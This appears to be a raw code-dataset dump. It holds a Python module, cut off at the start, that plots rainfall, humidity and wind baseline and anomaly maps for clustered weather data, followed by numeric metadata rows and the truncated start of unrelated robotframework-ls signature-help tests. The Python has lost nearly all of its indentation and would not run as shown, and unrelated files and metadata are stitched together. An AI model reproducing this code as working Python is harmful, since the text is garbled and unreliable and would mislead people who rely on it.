axins_rhum = inset_axes(ax_rhum, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rhum.transAxes);
cbar_rhum = fig.colorbar(Rhum, cax=axins_rhum, label='Relative humidity anomaly (%)', orientation='horizontal', pad=0.01,
ticks = levels);
cbar_rhum.ax.xaxis.set_ticks_position('top')
cbar_rhum.ax.xaxis.set_label_position('top')
# break
print(f"==> Rhum plots plotted for {pressure}hpa")
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_rhum_Regionalonly_ANOM_v2-at-{pressure}hpa_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
# sys.exit()
print(f"\n\nTime taken to plot RHUM ANOMALIES for regional: {utils.time_since(rhumstarttime)}.")
def print_rf_gt1mm_ANOM_Regionalonly(model, dest, optimal_k):
print('Printing RF gt1mm ANOM_regional')
    # RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)  # unused: values now come from get_RF_calculations
w_lim_regional = 96
e_lim_regional = 111.6
s_lim_regional = -4.5
n_lim_regional = 8
# RFprec_to_ClusterLabels_dataset = RFprec_to_ClusterLabels_dataset.sel(
# lon=slice(w_lim_regional, e_lim_regional),lat=slice(s_lim_regional, n_lim_regional))
# rf_ds_lon = RFprec_to_ClusterLabels_dataset.lon
# rf_ds_lat = RFprec_to_ClusterLabels_dataset.lat
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = get_RF_calculations(model, 'rf_ds_lon', regionalonly=True)
rf_ds_lat = get_RF_calculations(model, 'rf_ds_lat', regionalonly=True)
baseline = (get_RF_calculations(model, criteria="gt1mm", calculation="mean", clus="whole", regionalonly=True))
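    # clus="whole" yields the all-days baseline; per-cluster means computed in
    # the loop below are differenced against it to give the anomaly fields.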
w = rf_ds_lon.min().values
e = rf_ds_lon.max().values
s = rf_ds_lat.min().values
n = rf_ds_lat.max().values
# baseline = np.mean(RFprec_to_ClusterLabels_dataset.precipitationCal > 1, axis=0) * 100
all_colors = np.vstack(plt.cm.seismic_r(np.linspace(0,1,51)))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
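    # A discrete diverging map sampled from 'seismic_r': blue = wetter than
    # baseline, red = drier (the name 'terrain_map' is kept for consistency).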
fig.suptitle(f'Anomaly for rainfall above 1mm, regional extent, for model of: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E', fontweight='bold')
# levels = [int(i) for i in np.linspace(-100,100,21)]
levels1 = np.linspace(-100,100,81)
levels2 = np.arange(-100, 105, 5)
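    # levels1 gives fine steps for the filled contours; levels2 gives coarser
    # steps reused for contour labels and colorbar ticks (the concatenate in
    # clabel below drops the labels nearest zero to keep the centre readable).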
for clus in range(optimal_k):
time.sleep(1); gc.collect()
print(f'\n{utils.time_now()}: {clus}.. ');
data = get_RF_calculations(model, criteria="gt1mm", calculation="mean", clus=clus, regionalonly=True)
# data = RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).precipitationCal.values
# mean = np.mean(data > 1, axis=0)*100
mean = data-baseline
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('w')
ax_rf_plot.set_extent([w,e,s,n])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([np.ceil(w), np.floor(e)], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([np.ceil(w), np.floor(e)], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([s,n], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, mean.T,
# levels,
levels1,
cmap=terrain_map,
extend='neither')
conts = ax_rf_plot.contour(RF, 'w', linewidths=0.2)
ax_rf_plot.clabel(conts,
# conts.levels,
np.concatenate([levels2[:19], levels2[22:]]),
colors='k', inline=True, fmt='%1.f', fontsize=7)
ax_rf_plot.set_title(f"cluster no.{clus+1}", loc='left')
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Proportion of grid with >1 mm rainfall (%) relative to whole dataset baseline', orientation='horizontal', pad=0.01,
# ticks=np.arange(0,100,10)
# ticks=levels
ticks=levels2
)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
# break
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_rainday_gt1mm_Regionalonly_ANOM_v2_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
# sys.exit()
def print_rf_gt50mm_ANOM_Regionalonly(model, dest, optimal_k):
print('Printing RF gt50mm ANOM_regional')
# RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path)
w_lim_regional = 96
e_lim_regional = 111.6
s_lim_regional = -4.5
n_lim_regional = 8
# RFprec_to_ClusterLabels_dataset = RFprec_to_ClusterLabels_dataset.sel(
# lon=slice(w_lim_regional, e_lim_regional),lat=slice(s_lim_regional, n_lim_regional))
# rf_ds_lon = RFprec_to_ClusterLabels_dataset.lon
# rf_ds_lat = RFprec_to_ClusterLabels_dataset.lat
fig, gs_rf_plot = create_multisubplot_axes(optimal_k)
rf_ds_lon = get_RF_calculations(model, 'rf_ds_lon', regionalonly=True)
rf_ds_lat = get_RF_calculations(model, 'rf_ds_lat', regionalonly=True)
baseline = (get_RF_calculations(model, criteria="gt50mm", calculation="mean", clus="whole", regionalonly=True))
w = rf_ds_lon.min().values
e = rf_ds_lon.max().values
s = rf_ds_lat.min().values
n = rf_ds_lat.max().values
# baseline = np.mean(RFprec_to_ClusterLabels_dataset.precipitationCal > 50, axis=0) * 100
all_colors = np.vstack(plt.cm.seismic_r(np.linspace(0,1,11)))
terrain_map = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
fig.suptitle(f'Anomaly for rainfall above 50mm, regional extent, for model of: {model.domain[0]}S {model.domain[1]}N {model.domain[2]}W {model.domain[3]}E', fontweight='bold')
# levels = [int(i) for i in np.linspace(-100,100,21)]
levels1 = np.linspace(-20,20,81)
levels2 = np.arange(-19, 21, 2)
for clus in range(optimal_k):
time.sleep(1); gc.collect()
print(f'\n{utils.time_now()}: {clus}.. ');
data = get_RF_calculations(model, criteria="gt50mm", calculation="mean", clus=clus, regionalonly=True)
# data = RFprec_to_ClusterLabels_dataset.where(RFprec_to_ClusterLabels_dataset.cluster==clus, drop=True).precipitationCal.values
# mean = np.mean(data > 50, axis=0)*100
mean = data-baseline
time.sleep(1); gc.collect()
ax_rf_plot = fig.add_subplot(gs_rf_plot[clus], projection=ccrs.PlateCarree())
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor('w')
ax_rf_plot.set_extent([w,e,s,n])
ax_rf_plot.coastlines("50m", linewidth=.7, color='k')
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
if clus < model.grid_width: # top ticks
ax_rf_plot.set_xticks([np.ceil(w), np.floor(e)], crs=ccrs.PlateCarree())
ax_rf_plot.set_xticklabels([np.ceil(w), np.floor(e)], rotation=55)
ax_rf_plot.xaxis.tick_top()
else: ax_rf_plot.set_xticks([])
if clus % model.grid_width == model.grid_width - 1: # right-side ticks
ax_rf_plot.set_yticks([s,n], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
else: ax_rf_plot.set_yticks([])
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, mean.T,
levels1,
cmap=terrain_map,
extend='neither')
conts = ax_rf_plot.contour(RF, 'w', linewidths=0)
ax_rf_plot.clabel(conts,
# conts.levels,
np.concatenate([levels2[:9], levels2[11:]]),
colors='k', inline=True, fmt='%1.f', fontsize=8)
ax_rf_plot.set_title(f"cluster no.{clus+1}", loc='left')
time.sleep(1); gc.collect()
if clus == model.cbar_pos: # cbar
axins_rf = inset_axes(ax_rf_plot, width='100%', height='100%',
loc='lower left', bbox_to_anchor=(0, -.8, model.grid_width, .1),
bbox_transform=ax_rf_plot.transAxes)
cbar_rf = fig.colorbar(RF, cax=axins_rf, label='Proportion of grid with >50 mm rainfall (%) relative to whole dataset baseline', orientation='horizontal', pad=0.01,
# ticks=np.arange(0,100,10)
# ticks=levels
ticks=levels2
)
cbar_rf.ax.xaxis.set_ticks_position('top')
cbar_rf.ax.xaxis.set_label_position('top')
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f"{dest}/{model.month_names_joined}_RFplot_heavy_gt50mm_Regionalonly_ANOM_v2_{model.gridsize}x{model.gridsize}"
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
# def get_baseline_gt1mm(RFprec_to_ClusterLabels_dataset):
# data = (RFprec_to_ClusterLabels_dataset.precipitationCal > 1).values
# return np.mean(data, axis=0) * 100
# def get_baseline_gt50mm(RFprec_to_ClusterLabels_dataset):
# data = (RFprec_to_ClusterLabels_dataset.precipitationCal > 50).values
# return np.mean(data, axis=0) * 100
# def get_baseline_90perc(RFprec_to_ClusterLabels_dataset):
# data = RFprec_to_ClusterLabels_dataset.precipitationCal.values
# return np.percentile(data, 90, axis=0)
# def plot_baseline(colscheme, baseline, levels, ticks, plotparams, title, filename, label, model, dest, RFprec_to_ClusterLabels_dataset):
def plot_baseline(colscheme, baseline_criteria, calculation, levels, ticks, plotparams, title, filename, label, model, dest):
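    # Draws a single whole-dataset baseline map: `baseline_criteria` and
    # `calculation` are passed through to get_RF_calculations (e.g. "gt1mm"
    # with "mean"), and `plotparams` holds [facecolor, coastline colour,
    # border colour] for the three styling calls below.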
# baseline = baseline(RFprec_to_ClusterLabels_dataset)
baseline = get_RF_calculations(model, baseline_criteria, calculation=calculation, clus="whole")
rf_ds_lon = get_RF_calculations(model, criteria="rf_ds_lon")
rf_ds_lat = get_RF_calculations(model, criteria="rf_ds_lat")
fig = plt.Figure(figsize=(15,10))
ax_rf_plot = fig.add_subplot(111, projection=ccrs.PlateCarree())
ax_rf_plot.set_title(f"{title}")
ax_rf_plot.xaxis.set_major_formatter(model.lon_formatter)
ax_rf_plot.yaxis.set_major_formatter(model.lat_formatter)
ax_rf_plot.set_facecolor(plotparams[0])
ax_rf_plot.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rf_plot.coastlines("50m", linewidth=.7, color=plotparams[1])
ax_rf_plot.add_feature(cf.BORDERS, linewidth=.5, color=plotparams[2], linestyle='dashed')
ax_rf_plot.set_xticks([np.round(i,0) for i in np.linspace(model.LON_W,model.LON_E,9)], crs=ccrs.PlateCarree())
ax_rf_plot.xaxis.tick_top()
ax_rf_plot.set_yticks([np.round(i,0) for i in np.linspace(model.LAT_S,model.LAT_N,9)], crs=ccrs.PlateCarree())
ax_rf_plot.yaxis.set_label_position("right")
ax_rf_plot.yaxis.tick_right()
# RF = ax_rf_plot.contourf(RFprec_to_ClusterLabels_dataset.lon,
# RFprec_to_ClusterLabels_dataset.lat, baseline.T,
# levels, cmap=colscheme, extend='neither')
RF = ax_rf_plot.contourf(rf_ds_lon, rf_ds_lat, baseline.T,
levels, cmap=colscheme, extend='neither')
conts = ax_rf_plot.contour(RF, linewidths=0,
levels=levels,
colors=('y',),linestyles=('-',))
ax_rf_plot.clabel(conts, conts.levels, colors='k',
inline=True, fmt='%1.0f', fontsize=10)
fig.colorbar(RF, ticks=ticks, label=label)
fn = f'{dest}/{model.month_names_joined}_{filename}_{model.gridsize}x{model.gridsize}'
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_RF_baselines(model, dest, optimal_k, too_large):
print(f'{utils.time_now()} - Printing RF gt1mm, gt50mm and 90th percentile baselines.')
# RFprec_to_ClusterLabels_dataset = utils.open_pickle(model.RFprec_to_ClusterLabels_dataset_path).sel(
# lon=slice(model.LON_W, model.LON_E), lat=slice(model.LAT_S, model.LAT_N))
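    # Custom colour schemes are assembled by sampling segments of stock
    # matplotlib colormaps and stacking them with np.vstack into a single
    # LinearSegmentedColormap, giving sharper breaks between value ranges
    # than any single stock map would.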
a = plt.cm.YlOrRd(np.linspace(.9, .2, 5))
b = plt.cm.YlGnBu(np.linspace(.2, .8, 10))
all_colors = np.vstack((a,b))
colscheme_gt1mm = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
zero_to_ten = plt.cm.gist_stern(np.linspace(1, .2, 2))
eleven_to_25 = plt.cm.gnuplot2(np.linspace(.9, 0.25, 10))
twnty5_to_40 = plt.cm.gist_earth(np.linspace(0.15, 0.9, 8))
all_colors = np.vstack((zero_to_ten, eleven_to_25, twnty5_to_40))
colscheme_gt50mm = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
z = plt.cm.gist_stern(np.linspace(1, .9, 1))
a = plt.cm.terrain(np.linspace(0.6, .1, 4))
b = plt.cm.gnuplot2(np.linspace(0.4, .9, 12))
all_colors = np.vstack((z, a, b))
colscheme_90perc = colors.LinearSegmentedColormap.from_list('terrain_map', all_colors)
#baseline_gt1mm = np.mean((RFprec_to_ClusterLabels_dataset.precipitationCal > 1).values, axis=0)*100
#baseline_gt50mm = np.mean((RFprec_to_ClusterLabels_dataset.precipitationCal > 50).values, axis=0)*100
#baseline_90perc = np.percentile(RFprec_to_ClusterLabels_dataset.precipitationCal,90,axis=0)
# baseline_gt1mm = get_baseline_gt1mm
# baseline_gt50mm = get_baseline_gt50mm
# baseline_90perc = get_baseline_90perc
baseline_gt1mm_criteria = "gt1mm"
baseline_gt50mm_criteria = "gt50mm"
baseline_90perc_criteria = "90perc"
calculation_gt1mm = "mean"
calculation_gt50mm = "mean"
calculation_90perc = "90perc"
levels_gt1mm = np.linspace(0,100,11)
levels_gt50mm = np.linspace(0,100,101)
levels_90perc = np.arange(0,500,12.5)
ticks_gt1mm = np.arange(0,100,10)
ticks_gt50mm = np.arange(0,100,10)
ticks_90perc = np.arange(0,500,50)
plotparams_gt1mm = ['k','w','w']
plotparams_gt50mm = ['white', 'k','k']
plotparams_90perc = ['white', 'k','k']
colschemes = [colscheme_gt1mm, colscheme_gt50mm, colscheme_90perc]
# baselines = [baseline_gt1mm, baseline_gt50mm, baseline_90perc]
baseline_criterias = [baseline_gt1mm_criteria, baseline_gt50mm_criteria, baseline_90perc_criteria]
calculation_ls = [calculation_gt1mm, calculation_gt50mm, calculation_90perc]
levels_ls = [levels_gt1mm, levels_gt50mm, levels_90perc]
ticks_ls = [ticks_gt1mm, ticks_gt50mm, ticks_90perc]
plotparams_ls = [plotparams_gt1mm, plotparams_gt50mm, plotparams_90perc]
titles = ['Plot of gt1mm baseline',
'Plot of gt50mm baseline',
'Plot of 90-percentile baseline']
filenames = ['RFplot_rainday_gt1mm_baseline',
'RFplot_heavy_gt50mm_baseline',
'RFplot_90th_percentile_baseline']
labels = ['Proportion of grid with gt1mm RF (%)',
'Proportion of grid with gt50mm RF (%)',
'90th percentile average over grid (mm)']
count=0
# for colscheme, baseline, levels, ticks, plotparams, title, filename, label in zip(
# colschemes, baselines, levels_ls, ticks_ls, plotparams_ls, titles, filenames, labels):
for colscheme, baseline_criteria, calculation, levels, ticks, plotparams, title, filename, label in zip(
colschemes, baseline_criterias, calculation_ls, levels_ls, ticks_ls, plotparams_ls, titles, filenames, labels):
        count += 1
        if count != 3: # only the 90th-percentile baseline (count == 3) is plotted; the gt1mm/gt50mm baselines are skipped here
            continue
print(f'{utils.time_now()} - Plotting {filename}...')
# plot_baseline(colscheme, baseline, levels, ticks, plotparams, title, filename, label, model, dest, RFprec_to_ClusterLabels_dataset)
plot_baseline(colscheme, baseline_criteria, calculation, levels, ticks, plotparams, title, filename, label, model, dest)
def get_baseline_quiver(target_ds_withClusterLabels, pressure, skip_interval):
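    # Returns the all-days mean wind at `pressure`, downsampled by
    # skip_interval: the speed grid plus unit-vector components (u, v)
    # for drawing quiver directions.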
uwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).uwnd.mean(
"time")[::skip_interval, ::skip_interval].values
vwnd_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).vwnd.mean(
"time")[::skip_interval, ::skip_interval].values
wndspd = np.hypot(vwnd_gridded_centroids,uwnd_gridded_centroids)
u = uwnd_gridded_centroids/wndspd;
v = vwnd_gridded_centroids/wndspd;
return wndspd, u, v
def print_quiver_baseline(model, dest, optimal_k):
print(f'{utils.time_now()} - Printing quiver baselines.')
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
area = (model.LON_E-model.LON_W)*(model.LAT_N-model.LAT_S)
coastline_lw = .8
minshaft=2; scale=33
if area > 3000: skip_interval=4
elif 2000 < area <= 3000: skip_interval=3
elif 500 < area <= 2000 : skip_interval=2; minshaft=3; scale=33
else: skip_interval=1; minshaft=3; scale=33
lon_qp = model.X[::skip_interval].values
lat_qp = model.Y[::skip_interval].values
    # baseline wind fields are computed per pressure level below via get_baseline_quiver
title = 'Quiver plot baseline'
filename = 'qp_baseline'
    label = 'Wind speed (m/s)'
print(f'{utils.time_now()} - Plotting {filename}...')
for idx, pressure in enumerate(model.uwnd_vwnd_pressure_lvls):
print(f'Currently on {pressure}hpa...')
fig = plt.Figure(figsize=(15,10))
ax_qp = fig.add_subplot(111, projection=ccrs.PlateCarree())
wndspd, u, v = get_baseline_quiver(target_ds_withClusterLabels, pressure, skip_interval)
ax_qp.xaxis.set_major_formatter(model.lon_formatter)
ax_qp.yaxis.set_major_formatter(model.lat_formatter)
ax_qp.set_facecolor('white')
ax_qp.add_feature(cf.LAND,facecolor='silver')
ax_qp.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_qp.set_xticks([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], crs=ccrs.PlateCarree())
ax_qp.xaxis.tick_top()
ax_qp.set_yticks([model.LAT_S, (model.LAT_N - model.LAT_S)/2 + model.LAT_S, model.LAT_N], crs=ccrs.PlateCarree())
ax_qp.yaxis.set_label_position("right")
ax_qp.yaxis.tick_right()
ax_qp.set_title(f"Pressure: {pressure} hpa, {title}", loc='left')
spd_plot = ax_qp.contourf(lon_qp, lat_qp, wndspd, np.linspace(0,18,19),
transform=ccrs.PlateCarree(), cmap='terrain_r',
alpha=1)
Quiver = ax_qp.quiver(lon_qp, lat_qp, u, v, color='Black', minshaft=minshaft, scale=scale)
conts = ax_qp.contour(spd_plot, 'w', linewidths=.3)
ax_qp.coastlines("50m", linewidth=coastline_lw, color='orangered')
ax_qp.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
ax_qp.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=5)
cbar_qp = fig.colorbar(spd_plot, label=label, orientation='horizontal')
cbar_qp.ax.xaxis.set_ticks_position('top')
cbar_qp.ax.xaxis.set_label_position('top')
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f'{dest}/{model.month_names_joined}_{filename}-at-{pressure}hpa_{model.gridsize}x{model.gridsize}'
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def print_quiver_baseline_regional(model, dest, optimal_k):
print(f'{utils.time_now()} - Printing quiver baselines.')
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
w_lim_regional = 96
e_lim_regional = 111.6
s_lim_regional = -4.5
n_lim_regional = 8
target_ds_withClusterLabels = target_ds_withClusterLabels.sel(lon=slice(w_lim_regional, e_lim_regional),lat=slice(n_lim_regional, s_lim_regional))
area = (model.LON_E-model.LON_W)*(model.LAT_N-model.LAT_S)
coastline_lw = .8
minshaft=2; scale=33
if area > 3000: skip_interval=4
elif 2000 < area <= 3000: skip_interval=3
elif 500 < area <= 2000 : skip_interval=2; minshaft=3; scale=33
else: skip_interval=1; minshaft=3; scale=33
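    # Override the heuristic above: the regional window is small enough to
    # plot every grid point.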
skip_interval=1
# lon_qp = model.X[::skip_interval].values
# lat_qp = model.Y[::skip_interval].values
lon_qp = target_ds_withClusterLabels.lon
lat_qp = target_ds_withClusterLabels.lat
w = lon_qp.min().data
e = lon_qp.max().data
s = lat_qp.min().data
n = lat_qp.max().data
    # baseline wind fields are computed per pressure level below via get_baseline_quiver
title = 'Quiver plot baseline (Regional-only)'
filename = 'qp_baseline_Regionalonly'
    label = 'Wind speed (m/s)'
print(f'{utils.time_now()} - Plotting {filename}...')
for idx, pressure in enumerate(model.uwnd_vwnd_pressure_lvls):
print(f'Currently on {pressure}hpa...')
fig = plt.Figure(figsize=(15,10))
ax_qp = fig.add_subplot(111, projection=ccrs.PlateCarree())
wndspd, u, v = get_baseline_quiver(target_ds_withClusterLabels, pressure, skip_interval)
ax_qp.xaxis.set_major_formatter(model.lon_formatter)
ax_qp.yaxis.set_major_formatter(model.lat_formatter)
ax_qp.set_facecolor('white')
ax_qp.add_feature(cf.LAND,facecolor='silver')
# ax_qp.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_qp.set_extent([w,e,s,n])
ax_qp.set_xticks(np.linspace(w,e, 5), crs=ccrs.PlateCarree())
ax_qp.set_xticklabels(np.linspace(w,e, 5), rotation=55)
# ax_qp.set_xticks([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], crs=ccrs.PlateCarree())
ax_qp.xaxis.tick_top()
ax_qp.set_yticks(np.linspace(s,n, 5), crs=ccrs.PlateCarree())
# ax_qp.set_yticks([model.LAT_S, (model.LAT_N - model.LAT_S)/2 + model.LAT_S, model.LAT_N], crs=ccrs.PlateCarree())
ax_qp.yaxis.set_label_position("right")
ax_qp.yaxis.tick_right()
ax_qp.set_title(f"Pressure: {pressure} hpa, {title}", loc='left')
spd_plot = ax_qp.contourf(lon_qp, lat_qp, wndspd, np.linspace(0,18,19),
transform=ccrs.PlateCarree(), cmap='terrain_r',
alpha=1)
Quiver = ax_qp.quiver(lon_qp, lat_qp, u, v, color='Black', minshaft=minshaft, scale=scale)
conts = ax_qp.contour(spd_plot, 'w', linewidths=.3)
ax_qp.coastlines("50m", linewidth=coastline_lw, color='orangered')
ax_qp.add_feature(cf.BORDERS, linewidth=.5, color='k', linestyle='dashed')
ax_qp.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=5)
cbar_qp = fig.colorbar(spd_plot, label=label, orientation='horizontal')
cbar_qp.ax.xaxis.set_ticks_position('top')
cbar_qp.ax.xaxis.set_label_position('top')
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f'{dest}/{model.month_names_joined}_{filename}-at-{pressure}hpa_{model.gridsize}x{model.gridsize}'
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
def get_baseline_rhum(target_ds_withClusterLabels, pressure):
rhum_gridded_centroids = target_ds_withClusterLabels.sel(level=pressure).rhum.mean("time")
return rhum_gridded_centroids
def print_rhum_baseline(model, dest, optimal_k):
print(f'{utils.time_now()} - Printing RHUM baselines.')
target_ds_withClusterLabels = utils.open_pickle(model.target_ds_withClusterLabels_path)
target_ds_withClusterLabels = utils.remove_expver(target_ds_withClusterLabels)
    # baseline RHUM is computed per pressure level below via get_baseline_rhum
title = 'Relative humidity baseline'
filename = 'rhum_baseline'
label = 'Relative humidity (%)'
print(f'{utils.time_now()} - Plotting {filename}...')
for idx, pressure in enumerate(model.rhum_pressure_levels):
print(f'Currently on {pressure}hpa...')
fig = plt.Figure(figsize=(15,10))
ax_rhum = fig.add_subplot(111, projection=ccrs.PlateCarree())
rhum_gridded_centroids = get_baseline_rhum(target_ds_withClusterLabels, pressure)
ax_rhum.coastlines("50m", linewidth=.7, color='w')
ax_rhum.add_feature(cf.BORDERS, linewidth=.5, color='w', linestyle='dashed')
ax_rhum.set_facecolor('white')
ax_rhum.add_feature(cf.LAND, facecolor='w')
ax_rhum.set_extent([model.LON_W-1, model.LON_E+1, model.LAT_S-1, model.LAT_N+1])
ax_rhum.set_xticks([model.LON_W, (model.LON_E - model.LON_W)/2 + model.LON_W, model.LON_E], crs=ccrs.PlateCarree())
ax_rhum.xaxis.tick_top()
ax_rhum.set_yticks([model.LAT_S, (model.LAT_N - model.LAT_S)/2 + model.LAT_S, model.LAT_N], crs=ccrs.PlateCarree())
ax_rhum.yaxis.set_label_position("right")
ax_rhum.yaxis.tick_right()
ax_rhum.set_title(f"Pressure: {pressure} hpa, {title}", loc='left')
normi = mpl.colors.Normalize(vmin=model.min_maxes['rhum_min'], vmax=model.min_maxes['rhum_max']);
Rhum = ax_rhum.contourf(model.X, model.Y, rhum_gridded_centroids,
np.linspace(model.min_maxes['rhum_min'], model.min_maxes['rhum_max'], 21),
norm=normi, cmap='jet_r')
conts = ax_rhum.contour(Rhum, 'k:', linewidths=.5)
ax_rhum.clabel(conts, conts.levels, inline=True, fmt='%1.f', fontsize=10)
cbar = fig.colorbar(Rhum, label=label, orientation='horizontal')
cbar.ax.xaxis.set_ticks_position('top')
cbar.ax.xaxis.set_label_position('top')
fig.subplots_adjust(wspace=0.05,hspace=0.3)
fn = f'{dest}/{model.month_names_joined}_{filename}-at-{pressure}hpa_{model.gridsize}x{model.gridsize}'
fig.savefig(fn, bbox_inches='tight', pad_inches=1)
print(f'file saved @:\n{fn}')
plt.close('all')
| 48.933264
| 301
| 0.654567
| 27,358
| 188,442
| 4.24947
| 0.031801
| 0.023224
| 0.027732
| 0.043111
| 0.892084
| 0.880506
| 0.870107
| 0.858348
| 0.846117
| 0.832535
| 0
| 0.030079
| 0.210845
| 188,442
| 3,850
| 302
| 48.945974
| 0.751691
| 0.1329
| 0
| 0.749708
| 0
| 0.056831
| 0.149278
| 0.036803
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019852
| false
| 0
| 0.007007
| 0
| 0.033087
| 0.081744
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d8837c4fdc3c4488b67d13e0418faf011088b935
| 18,485
|
py
|
Python
|
robotframework-ls/tests/robotframework_ls_tests/test_signature_help.py
|
GLMeece/robotframework-lsp
|
dc9c807c4a192d252df1d05a1c5d16f8c1f24086
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
robotframework-ls/tests/robotframework_ls_tests/test_signature_help.py
|
GLMeece/robotframework-lsp
|
dc9c807c4a192d252df1d05a1c5d16f8c1f24086
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
robotframework-ls/tests/robotframework_ls_tests/test_signature_help.py
|
GLMeece/robotframework-lsp
|
dc9c807c4a192d252df1d05a1c5d16f8c1f24086
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
def test_signature_help_basic(workspace, libspec_manager, data_regression):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
from robocorp_ls_core.lsp import MarkupKind
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Test Cases ***
Log It
Log """,
)
completion_context = CompletionContext(doc, workspace=workspace.ws)
result = signature_help(completion_context)
signatures = result["signatures"]
# Don't check the signature documentation in the data regression so that the
# test doesn't become brittle.
docs = signatures[0].pop("documentation")
assert sorted(docs.keys()) == ["kind", "value"]
assert docs["kind"] == MarkupKind.Markdown
assert "Log" in docs["value"]
data_regression.check(result)
def test_signature_help_parameters_in_1st_eol(
workspace, libspec_manager, data_regression
):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2}
Log To Console ${arg1} ${arg2}
*** Test Cases ***
Log It
Some keyword """,
)
completion_context = CompletionContext(doc, workspace=workspace.ws)
data_regression.check(signature_help(completion_context))
def test_signature_help_parameters_in_1st(workspace, libspec_manager, data_regression):
from robotframework_ls.impl.completion_context import CompletionContext
from robotframework_ls.impl.signature_help import signature_help
workspace.set_root("case4", libspec_manager=libspec_manager)
doc = workspace.put_doc(
"case4.robot",
"""
*** Keywords ***
Some Keyword
[Arguments] ${arg1} ${arg2}
